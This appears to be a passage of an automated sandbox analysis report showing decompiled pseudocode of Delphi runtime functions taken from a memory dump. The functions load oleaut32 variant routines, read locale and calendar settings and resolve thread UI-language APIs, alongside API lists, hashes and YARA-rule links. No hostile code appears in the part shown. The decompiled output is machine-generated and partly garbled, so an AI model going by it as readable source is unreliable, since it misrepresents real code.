				 *0x4c1138 = E00427848("VarNeg", E004272AC, _t91);
				 *0x4c113c = E00427848("VarNot", E004272AC, _t91);
				 *0x4c1140 = E00427848("VarAdd", E004272B8, _t91);
				 *0x4c1144 = E00427848("VarSub", E004272B8, _t91);
				 *0x4c1148 = E00427848("VarMul", E004272B8, _t91);
				 *0x4c114c = E00427848("VarDiv", E004272B8, _t91);
				 *0x4c1150 = E00427848("VarIdiv", E004272B8, _t91);
				 *0x4c1154 = E00427848("VarMod", E004272B8, _t91);
				 *0x4c1158 = E00427848("VarAnd", E004272B8, _t91);
				 *0x4c115c = E00427848("VarOr", E004272B8, _t91);
				 *0x4c1160 = E00427848("VarXor", E004272B8, _t91);
				 *0x4c1164 = E00427848("VarCmp", E004272C4, _t91);
				 *0x4c1168 = E00427848("VarI4FromStr", E004272D0, _t91);
				 *0x4c116c = E00427848("VarR4FromStr", E0042733C, _t91);
				 *0x4c1170 = E00427848("VarR8FromStr", E004273AC, _t91);
				 *0x4c1174 = E00427848("VarDateFromStr", E0042741C, _t91);
				 *0x4c1178 = E00427848("VarCyFromStr", E0042748C, _t91);
				 *0x4c117c = E00427848("VarBoolFromStr", E004274FC, _t91);
				 *0x4c1180 = E00427848("VarBstrFromCy", E0042757C, _t91);
				 *0x4c1184 = E00427848("VarBstrFromDate", E00427624, _t91);
				_t46 = E00427848("VarBstrFromBool", E004277B4, _t91);
				 *0x4c1188 = _t46;
				return _t46;
			}






                                                                                    0x00427882
                                                                                    0x00427896
                                                                                    0x004278ac
                                                                                    0x004278c2
                                                                                    0x004278d8
                                                                                    0x004278ee
                                                                                    0x00427904
                                                                                    0x0042791a
                                                                                    0x00427930
                                                                                    0x00427946
                                                                                    0x0042795c
                                                                                    0x00427972
                                                                                    0x00427988
                                                                                    0x0042799e
                                                                                    0x004279b4
                                                                                    0x004279ca
                                                                                    0x004279e0
                                                                                    0x004279f6
                                                                                    0x00427a0c
                                                                                    0x00427a22
                                                                                    0x00427a38
                                                                                    0x00427a4e
                                                                                    0x00427a5e
                                                                                    0x00427a64
                                                                                    0x00427a6b

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(oleaut32.dll), ref: 0042787D
                                                                                      • Part of subcall function 00427848: GetProcAddress.KERNEL32(00000000), ref: 00427861
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                    • API String ID: 1646373207-1918263038
                                                                                    • Opcode ID: 3edd394f2c42f1ee7728dbbd964d2d48b2f407ea9c7b21d0b846acf91e36c10d
                                                                                    • Instruction ID: afb448a43cf45882875cbd5333393c9475fd06a837c60371df2c799b3a2ca9d5
                                                                                    • Opcode Fuzzy Hash: 3edd394f2c42f1ee7728dbbd964d2d48b2f407ea9c7b21d0b846acf91e36c10d
                                                                                    • Instruction Fuzzy Hash: 4741442078D2689A53007BAA3C0692A7B9CD64A7243E0E07FF5048B766DF7CAC40867D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041E7CC, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 194threadCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 82%
                                                                                    			E0041E7CC(void* __eax, void* __ebx, signed int __edx, void* __edi, void* __esi, long long __fp0) {
				signed int _v8;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr* _t32;
				signed int _t53;
				signed int _t56;
				signed int _t71;
				signed int _t78;
				signed int* _t82;
				signed int _t85;
				void* _t93;
				signed int _t94;
				signed int _t95;
				signed int _t98;
				signed int _t99;
				void* _t105;
				intOrPtr _t106;
				signed int _t109;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t131;
				void* _t132;
				signed int _t134;
				void* _t136;
				void* _t137;
				void* _t139;
				void* _t140;
				intOrPtr _t141;
				void* _t142;
				long long _t161;

				_t161 = __fp0;
				_t126 = __edi;
				_t109 = __edx;
				_t139 = _t140;
				_t141 = _t140 + 0xfffffff0;
				_push(__edi);
				_v12 = 0;
				_v8 = __edx;
				_t93 = __eax;
				_push(_t139);
				_push(0x41ea61);
				_push( *[fs:eax]);
				 *[fs:eax] = _t141;
				_t32 =  *0x4ba590; // 0x4bb8f8
				_t144 =  *_t32;
				if( *_t32 == 0) {
					E0040554C(0x1a);
				}
				E00406688(E0040690C( *0x4be7e4, 0, _t126), _t109 | 0xffffffff, _t144);
				_push(_t139);
				_push(0x41ea44);
				_push( *[fs:edx]);
				 *[fs:edx] = _t141;
				 *0x4be7dc = 0;
				_push(0);
				E00409C00();
				_t142 = _t141 + 4;
				E0041E034(_t93, 0x41ea7c, 0x100b,  &_v12);
				_t127 = E0041A1C4(0x41ea7c, 1, _t144);
				if(_t127 + 0xfffffffd - 3 >= 0) {
					__eflags = _t127 - 0xffffffffffffffff;
					if(_t127 - 0xffffffffffffffff < 0) {
						 *0x4be7dc = 1;
						_push(1);
						E00409C00();
						_t142 = _t142 + 4;
						E00407E00( *0x4be7e0, L"B.C.");
						 *((intOrPtr*)( *0x4be7e0 + 4)) = 0;
						_t71 =  *0x4be7e0;
						 *((intOrPtr*)(_t71 + 8)) = 0xffc00000;
						 *((intOrPtr*)(_t71 + 0xc)) = 0xc1dfffff;
						E0041C1C4(1, 1, 1, __eflags, _t161);
						_v20 = E00405790();
						_v16 = 1;
						asm("fild qword [ebp-0x10]");
						 *((long long*)( *0x4be7e0 + 0x10)) = _t161;
						asm("wait");
						EnumCalendarInfoW(E0041E6A4, GetThreadLocale(), _t127, 4);
						_t78 =  *0x4be7e0;
						__eflags = _t78;
						if(_t78 != 0) {
							_t82 = _t78 - 4;
							__eflags = _t82;
							_t78 =  *_t82;
						}
						_t134 = _t78 - 1;
						__eflags = _t134;
						if(_t134 > 0) {
							_t98 = 1;
							do {
								 *((intOrPtr*)( *0x4be7e0 + 4 + (_t98 + _t98 * 2) * 8)) = 0xffffffff;
								_t98 = _t98 + 1;
								_t134 = _t134 - 1;
								__eflags = _t134;
							} while (_t134 != 0);
						}
						EnumCalendarInfoW(E0041E73C, GetThreadLocale(), _t127, 3);
					}
				} else {
					EnumCalendarInfoW(E0041E6A4, GetThreadLocale(), _t127, 4);
					_t85 =  *0x4be7e0;
					if(_t85 != 0) {
						_t85 =  *(_t85 - 4);
					}
					_t136 = _t85 - 1;
					if(_t136 >= 0) {
						_t137 = _t136 + 1;
						_t99 = 0;
						do {
							 *((intOrPtr*)( *0x4be7e0 + 4 + (_t99 + _t99 * 2) * 8)) = 0xffffffff;
							_t99 = _t99 + 1;
							_t137 = _t137 - 1;
						} while (_t137 != 0);
					}
					EnumCalendarInfoW(E0041E73C, GetThreadLocale(), _t127, 3);
				}
				_t94 =  *0x4be7e0;
				if(_t94 != 0) {
					_t94 =  *(_t94 - 4);
				}
				_push(_t94);
				E00409C00();
				_t53 =  *0x4be7e0;
				if(_t53 != 0) {
					_t53 =  *(_t53 - 4);
				}
				_t131 = _t53 - 1;
				if(_t131 >= 0) {
					_t132 = _t131 + 1;
					_t95 = 0;
					do {
						_t127 = _t95 + _t95 * 2;
						_t106 =  *0x416e18; // 0x416e1c
						E00408F5C( *((intOrPtr*)(_v8 + 0xbc)) + (_t95 + _t95 * 2) * 8, _t106,  *0x4be7e0 + (_t95 + _t95 * 2) * 8);
						_t95 = _t95 + 1;
						_t132 = _t132 - 1;
					} while (_t132 != 0);
				}
				_t116 =  *0x41e600; // 0x41e604
				E00409D24(0x4be7e0, _t116);
				_t56 =  *0x4be7e0;
				if(_t56 != 0) {
					_t56 =  *(_t56 - 4);
				}
				 *0x4be7dc = _t56;
				_pop(_t117);
				_pop(_t105);
				 *[fs:eax] = _t117;
				_push(0x41ea4b);
				return E00406868( *0x4be7e4, _t105, _t127);
			}


































                                                                                    0x0041e7cc
                                                                                    0x0041e7cc
                                                                                    0x0041e7cc
                                                                                    0x0041e7cd
                                                                                    0x0041e7cf
                                                                                    0x0041e7d4
                                                                                    0x0041e7d7
                                                                                    0x0041e7da
                                                                                    0x0041e7dd
                                                                                    0x0041e7e1
                                                                                    0x0041e7e2
                                                                                    0x0041e7e7
                                                                                    0x0041e7ea
                                                                                    0x0041e7ed
                                                                                    0x0041e7f2
                                                                                    0x0041e7f5
                                                                                    0x0041e7f9
                                                                                    0x0041e7f9
                                                                                    0x0041e80b
                                                                                    0x0041e812
                                                                                    0x0041e813
                                                                                    0x0041e818
                                                                                    0x0041e81b
                                                                                    0x0041e820
                                                                                    0x0041e826
                                                                                    0x0041e837
                                                                                    0x0041e83c
                                                                                    0x0041e84f
                                                                                    0x0041e861
                                                                                    0x0041e86b
                                                                                    0x0041e8c8
                                                                                    0x0041e8cb
                                                                                    0x0041e8d6
                                                                                    0x0041e8dc
                                                                                    0x0041e8ed
                                                                                    0x0041e8f2
                                                                                    0x0041e8ff
                                                                                    0x0041e90b
                                                                                    0x0041e90e
                                                                                    0x0041e913
                                                                                    0x0041e91a
                                                                                    0x0041e92d
                                                                                    0x0041e937
                                                                                    0x0041e93a
                                                                                    0x0041e93d
                                                                                    0x0041e945
                                                                                    0x0041e948
                                                                                    0x0041e957
                                                                                    0x0041e95c
                                                                                    0x0041e961
                                                                                    0x0041e963
                                                                                    0x0041e965
                                                                                    0x0041e965
                                                                                    0x0041e968
                                                                                    0x0041e968
                                                                                    0x0041e96c
                                                                                    0x0041e96d
                                                                                    0x0041e96f
                                                                                    0x0041e971
                                                                                    0x0041e976
                                                                                    0x0041e97f
                                                                                    0x0041e987
                                                                                    0x0041e988
                                                                                    0x0041e988
                                                                                    0x0041e988
                                                                                    0x0041e976
                                                                                    0x0041e999
                                                                                    0x0041e999
                                                                                    0x0041e86d
                                                                                    0x0041e87b
                                                                                    0x0041e880
                                                                                    0x0041e887
                                                                                    0x0041e88c
                                                                                    0x0041e88c
                                                                                    0x0041e890
                                                                                    0x0041e893
                                                                                    0x0041e895
                                                                                    0x0041e896
                                                                                    0x0041e898
                                                                                    0x0041e8a1
                                                                                    0x0041e8a9
                                                                                    0x0041e8aa
                                                                                    0x0041e8aa
                                                                                    0x0041e898
                                                                                    0x0041e8bb
                                                                                    0x0041e8bb
                                                                                    0x0041e9a3
                                                                                    0x0041e9a7
                                                                                    0x0041e9ac
                                                                                    0x0041e9ac
                                                                                    0x0041e9ae
                                                                                    0x0041e9c2
                                                                                    0x0041e9ca
                                                                                    0x0041e9d1
                                                                                    0x0041e9d6
                                                                                    0x0041e9d6
                                                                                    0x0041e9da
                                                                                    0x0041e9dd
                                                                                    0x0041e9df
                                                                                    0x0041e9e0
                                                                                    0x0041e9e2
                                                                                    0x0041e9e2
                                                                                    0x0041e9fa
                                                                                    0x0041ea00
                                                                                    0x0041ea05
                                                                                    0x0041ea06
                                                                                    0x0041ea06
                                                                                    0x0041e9e2
                                                                                    0x0041ea0e
                                                                                    0x0041ea14
                                                                                    0x0041ea19
                                                                                    0x0041ea20
                                                                                    0x0041ea25
                                                                                    0x0041ea25
                                                                                    0x0041ea27
                                                                                    0x0041ea2e
                                                                                    0x0041ea30
                                                                                    0x0041ea31
                                                                                    0x0041ea34
                                                                                    0x0041ea43

                                                                                    APIs
                                                                                    • GetThreadLocale.KERNEL32(00000000,00000004), ref: 0041E870
                                                                                    • EnumCalendarInfoW.KERNEL32(0041E6A4,00000000,00000000,00000004), ref: 0041E87B
                                                                                    • GetThreadLocale.KERNEL32(00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E8B0
                                                                                    • EnumCalendarInfoW.KERNEL32(0041E73C,00000000,00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E8BB
                                                                                    • GetThreadLocale.KERNEL32(00000000,00000004), ref: 0041E94C
                                                                                    • EnumCalendarInfoW.KERNEL32(0041E6A4,00000000,00000000,00000004), ref: 0041E957
                                                                                    • GetThreadLocale.KERNEL32(00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E98E
                                                                                    • EnumCalendarInfoW.KERNEL32(0041E73C,00000000,00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E999
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CalendarEnumInfoLocaleThread
                                                                                    • String ID: B.C.$ToA$K$K$K
                                                                                    • API String ID: 683597275-1724967715
                                                                                    • Opcode ID: 30548e6079ac2033bf0e04708f2267278c7844b43060e3a4cc9a960100252a35
                                                                                    • Instruction ID: 5f9a2d1895d99171d8daf0119b8bb3b5d98f795b9e196a74a36fcd0882631485
                                                                                    • Opcode Fuzzy Hash: 30548e6079ac2033bf0e04708f2267278c7844b43060e3a4cc9a960100252a35
                                                                                    • Instruction Fuzzy Hash: 3061D7786002009FD710EF2BCC85AD677A9FB84354B518A7AFC019B3A6CB78DC41CB99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040A250, Relevance: 21.0, APIs: 8, Strings: 4, Instructions: 28libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E0040A250() {
				signed int _t2;
				_Unknown_base(*)()* _t8;

				InitializeCriticalSection(0x4bdc10);
				 *0x4bdc28 = 0x7f;
				_t2 = GetVersion() & 0x000000ff;
				 *0x4bdc0c = _t2 - 6 >= 0;
				if( *0x4bdc0c != 0) {
					 *0x4bdc00 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetThreadPreferredUILanguages");
					 *0x4bdc04 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "SetThreadPreferredUILanguages");
					_t8 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetThreadUILanguage");
					 *0x4bdc08 = _t8;
					return _t8;
				}
				return _t2;
			}





                                                                                    0x0040a255
                                                                                    0x0040a25a
                                                                                    0x0040a268
                                                                                    0x0040a270
                                                                                    0x0040a27e
                                                                                    0x0040a295
                                                                                    0x0040a2af
                                                                                    0x0040a2c4
                                                                                    0x0040a2c9
                                                                                    0x00000000
                                                                                    0x0040a2c9
                                                                                    0x0040a2ce

                                                                                    APIs
                                                                                    • InitializeCriticalSection.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A255
                                                                                    • GetVersion.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A263
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A28A
                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A290
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2A4
                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2AA
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadUILanguage,00000000,kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2BE
                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2C4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc$CriticalInitializeSectionVersion
                                                                                    • String ID: GetThreadPreferredUILanguages$GetThreadUILanguage$SetThreadPreferredUILanguages$kernel32.dll
                                                                                    • API String ID: 74573329-1403180336
                                                                                    • Opcode ID: 58d327082e64ef42c945ef42cd8e374577ec01c28157982806072b66866d47a0
                                                                                    • Instruction ID: d84369935ce7e940d286def53580bf621e493dc20acbcc0033f4522394103be5
                                                                                    • Opcode Fuzzy Hash: 58d327082e64ef42c945ef42cd8e374577ec01c28157982806072b66866d47a0
                                                                                    • Instruction Fuzzy Hash: F9F098A49853413DD6207F769D07B292D685A0170AF644AFFB410763D3EEFE4190E71E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041E0AC, Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 216threadCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 71%
                                                                                    			E0041E0AC(int __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				int _t55;
				void* _t121;
				void* _t128;
				void* _t151;
				void* _t152;
				intOrPtr _t172;
				intOrPtr _t204;
				signed short _t212;
				int _t214;
				intOrPtr _t216;
				intOrPtr _t217;
				void* _t224;

				_t224 = __fp0;
				_t211 = __edi;
				_t216 = _t217;
				_t152 = 7;
				do {
					_push(0);
					_push(0);
					_t152 = _t152 - 1;
				} while (_t152 != 0);
				_push(__edi);
				_t151 = __edx;
				_t214 = __eax;
				_push(_t216);
				_push(0x41e391);
				_push( *[fs:eax]);
				 *[fs:eax] = _t217;
				_t55 = IsValidLocale(__eax, 1);
				_t219 = _t55;
				if(_t55 == 0) {
					_t214 = GetThreadLocale();
				}
				_t172 =  *0x416f50; // 0x416f54
				E00409D24(_t151 + 0xbc, _t172);
				E0041E7CC(_t214, _t151, _t151, _t211, _t214, _t224);
				E0041E4A0(_t214, _t151, _t151, _t211, _t214);
				E0041E55C(_t214, _t151, _t151, _t211, _t214);
				E0041E034(_t214, 0, 0x14,  &_v20);
				E00407E00(_t151, _v20);
				E0041E034(_t214, 0x41e3ac, 0x1b,  &_v24);
				 *((char*)(_t151 + 4)) = E0041A1C4(0x41e3ac, 0, _t219);
				E0041E034(_t214, 0x41e3ac, 0x1c,  &_v28);
				 *((char*)(_t151 + 0xc6)) = E0041A1C4(0x41e3ac, 0, _t219);
				 *((short*)(_t151 + 0xc0)) = E0041E080(_t214, 0x2c, 0xf);
				 *((short*)(_t151 + 0xc2)) = E0041E080(_t214, 0x2e, 0xe);
				E0041E034(_t214, 0x41e3ac, 0x19,  &_v32);
				 *((char*)(_t151 + 5)) = E0041A1C4(0x41e3ac, 0, _t219);
				_t212 = E0041E080(_t214, 0x2f, 0x1d);
				 *(_t151 + 6) = _t212;
				_push(_t212);
				E0041EB18(_t214, _t151, L"m/d/yy", 0x1f, _t212, _t214, _t219,  &_v36);
				E00407E00(_t151 + 0xc, _v36);
				_push( *(_t151 + 6) & 0x0000ffff);
				E0041EB18(_t214, _t151, L"mmmm d, yyyy", 0x20, _t212, _t214, _t219,  &_v40);
				E00407E00(_t151 + 0x10, _v40);
				 *((short*)(_t151 + 8)) = E0041E080(_t214, 0x3a, 0x1e);
				E0041E034(_t214, 0x41e400, 0x28,  &_v44);
				E00407E00(_t151 + 0x14, _v44);
				E0041E034(_t214, 0x41e414, 0x29,  &_v48);
				E00407E00(_t151 + 0x18, _v48);
				E00407A20( &_v12);
				E00407A20( &_v16);
				E0041E034(_t214, 0x41e3ac, 0x25,  &_v52);
				_t121 = E0041A1C4(0x41e3ac, 0, _t219);
				_t220 = _t121;
				if(_t121 != 0) {
					E00407E48( &_v8, 0x41e438);
				} else {
					E00407E48( &_v8, 0x41e428);
				}
				E0041E034(_t214, 0x41e3ac, 0x23,  &_v56);
				_t128 = E0041A1C4(0x41e3ac, 0, _t220);
				_t221 = _t128;
				if(_t128 == 0) {
					E0041E034(_t214, 0x41e3ac, 0x1005,  &_v60);
					if(E0041A1C4(0x41e3ac, 0, _t221) != 0) {
						E00407E48( &_v12, L"AMPM ");
					} else {
						E00407E48( &_v16, L" AMPM");
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E004087C4(_t151 + 0x1c, _t151, 4, _t212, _t214);
				_push(_v12);
				_push(_v8);
				_push(L":mm:ss");
				_push(_v16);
				E004087C4(_t151 + 0x20, _t151, 4, _t212, _t214);
				 *((short*)(_t151 + 0xa)) = E0041E080(_t214, 0x2c, 0xc);
				 *((short*)(_t151 + 0xc4)) = 0x32;
				_pop(_t204);
				 *[fs:eax] = _t204;
				_push(0x41e398);
				return E00407A80( &_v60, 0xe);
			}





























                                                                                    0x0041e0ac
                                                                                    0x0041e0ac
                                                                                    0x0041e0ad
                                                                                    0x0041e0af
                                                                                    0x0041e0b4
                                                                                    0x0041e0b4
                                                                                    0x0041e0b6
                                                                                    0x0041e0b8
                                                                                    0x0041e0b8
                                                                                    0x0041e0bd
                                                                                    0x0041e0be
                                                                                    0x0041e0c0
                                                                                    0x0041e0c4
                                                                                    0x0041e0c5
                                                                                    0x0041e0ca
                                                                                    0x0041e0cd
                                                                                    0x0041e0d3
                                                                                    0x0041e0d8
                                                                                    0x0041e0da
                                                                                    0x0041e0e1
                                                                                    0x0041e0e1
                                                                                    0x0041e0e9
                                                                                    0x0041e0ef
                                                                                    0x0041e0f8
                                                                                    0x0041e101
                                                                                    0x0041e10a
                                                                                    0x0041e11c
                                                                                    0x0041e126
                                                                                    0x0041e13b
                                                                                    0x0041e14a
                                                                                    0x0041e15d
                                                                                    0x0041e16c
                                                                                    0x0041e182
                                                                                    0x0041e199
                                                                                    0x0041e1b0
                                                                                    0x0041e1bf
                                                                                    0x0041e1d2
                                                                                    0x0041e1d4
                                                                                    0x0041e1d8
                                                                                    0x0041e1e9
                                                                                    0x0041e1f4
                                                                                    0x0041e1fd
                                                                                    0x0041e20e
                                                                                    0x0041e219
                                                                                    0x0041e22e
                                                                                    0x0041e242
                                                                                    0x0041e24d
                                                                                    0x0041e262
                                                                                    0x0041e26d
                                                                                    0x0041e275
                                                                                    0x0041e27d
                                                                                    0x0041e292
                                                                                    0x0041e29c
                                                                                    0x0041e2a1
                                                                                    0x0041e2a3
                                                                                    0x0041e2bc
                                                                                    0x0041e2a5
                                                                                    0x0041e2ad
                                                                                    0x0041e2ad
                                                                                    0x0041e2d1
                                                                                    0x0041e2db
                                                                                    0x0041e2e0
                                                                                    0x0041e2e2
                                                                                    0x0041e2f4
                                                                                    0x0041e305
                                                                                    0x0041e31e
                                                                                    0x0041e307
                                                                                    0x0041e30f
                                                                                    0x0041e30f
                                                                                    0x0041e305
                                                                                    0x0041e323
                                                                                    0x0041e326
                                                                                    0x0041e329
                                                                                    0x0041e32e
                                                                                    0x0041e339
                                                                                    0x0041e33e
                                                                                    0x0041e341
                                                                                    0x0041e344
                                                                                    0x0041e349
                                                                                    0x0041e354
                                                                                    0x0041e369
                                                                                    0x0041e36d
                                                                                    0x0041e378
                                                                                    0x0041e37b
                                                                                    0x0041e37e
                                                                                    0x0041e390

                                                                                    APIs
                                                                                    • IsValidLocale.KERNEL32(?,00000001,00000000,0041E391,?,?,?,?,00000000,00000000), ref: 0041E0D3
                                                                                    • GetThreadLocale.KERNEL32(?,00000001,00000000,0041E391,?,?,?,?,00000000,00000000), ref: 0041E0DC
                                                                                      • Part of subcall function 0041E080: GetLocaleInfoW.KERNEL32(?,0000000F,?,00000002,0000002C,?,?,?,0041E182,?,00000001,00000000,0041E391), ref: 0041E093
                                                                                      • Part of subcall function 0041E034: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 0041E052
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Locale$Info$ThreadValid
                                                                                    • String ID: AMPM$2$:mm$:mm:ss$AMPM $ToA$m/d/yy$mmmm d, yyyy
                                                                                    • API String ID: 233154393-2808312488
                                                                                    • Opcode ID: 89dbd54baef797781c63ab5ee0a362cfcea0ac090ff54d53303b749289e312d8
                                                                                    • Instruction ID: 756c878950b08f5201d8436663b045c7a1b9734561897f0b9d621fb0846820d7
                                                                                    • Opcode Fuzzy Hash: 89dbd54baef797781c63ab5ee0a362cfcea0ac090ff54d53303b749289e312d8
                                                                                    • Instruction Fuzzy Hash: 887134387011199BDB05EB67C841BDE76AADF88304F50807BF904AB246DB3DDD82879E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040A7E4, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 71%
                                                                                    			E0040A7E4(signed short __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				char _v8;
				void* _t18;
				signed short _t28;
				intOrPtr _t35;
				intOrPtr* _t44;
				intOrPtr _t47;

				_t42 = __edi;
				_push(0);
				_push(__ebx);
				_push(__esi);
				_t44 = __edx;
				_t28 = __eax;
				_push(_t47);
				_push(0x40a8e8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t47;
				EnterCriticalSection(0x4bdc10);
				if(_t28 !=  *0x4bdc28) {
					LeaveCriticalSection(0x4bdc10);
					E00407A20(_t44);
					if(IsValidLocale(_t28 & 0x0000ffff, 2) != 0) {
						if( *0x4bdc0c == 0) {
							_t18 = E0040A4CC(_t28, _t28, _t44, __edi, _t44);
							L00403738();
							if(_t28 != _t18) {
								if( *_t44 != 0) {
									_t18 = E004086E4(_t44, E0040A900);
								}
								L00403738();
								E0040A4CC(_t18, _t28,  &_v8, _t42, _t44);
								E004086E4(_t44, _v8);
							}
						} else {
							E0040A6C8(_t28, _t44);
						}
					}
					EnterCriticalSection(0x4bdc10);
					 *0x4bdc28 = _t28;
					E0040A34C(0x4bdc2a, E004084EC( *_t44), 0xaa);
					LeaveCriticalSection(0x4bdc10);
				} else {
					E0040858C(_t44, 0x55, 0x4bdc2a);
					LeaveCriticalSection(0x4bdc10);
				}
				_pop(_t35);
				 *[fs:eax] = _t35;
				_push(E0040A8EF);
				return E00407A20( &_v8);
			}









                                                                                    0x0040a7e4
                                                                                    0x0040a7e7
                                                                                    0x0040a7e9
                                                                                    0x0040a7ea
                                                                                    0x0040a7eb
                                                                                    0x0040a7ed
                                                                                    0x0040a7f1
                                                                                    0x0040a7f2
                                                                                    0x0040a7f7
                                                                                    0x0040a7fa
                                                                                    0x0040a802
                                                                                    0x0040a80e
                                                                                    0x0040a835
                                                                                    0x0040a83c
                                                                                    0x0040a84e
                                                                                    0x0040a857
                                                                                    0x0040a868
                                                                                    0x0040a86d
                                                                                    0x0040a875
                                                                                    0x0040a87a
                                                                                    0x0040a883
                                                                                    0x0040a883
                                                                                    0x0040a888
                                                                                    0x0040a890
                                                                                    0x0040a89a
                                                                                    0x0040a89a
                                                                                    0x0040a859
                                                                                    0x0040a85d
                                                                                    0x0040a85d
                                                                                    0x0040a857
                                                                                    0x0040a8a4
                                                                                    0x0040a8a9
                                                                                    0x0040a8c3
                                                                                    0x0040a8cd
                                                                                    0x0040a810
                                                                                    0x0040a81c
                                                                                    0x0040a826
                                                                                    0x0040a826
                                                                                    0x0040a8d4
                                                                                    0x0040a8d7
                                                                                    0x0040a8da
                                                                                    0x0040a8e7

                                                                                    APIs
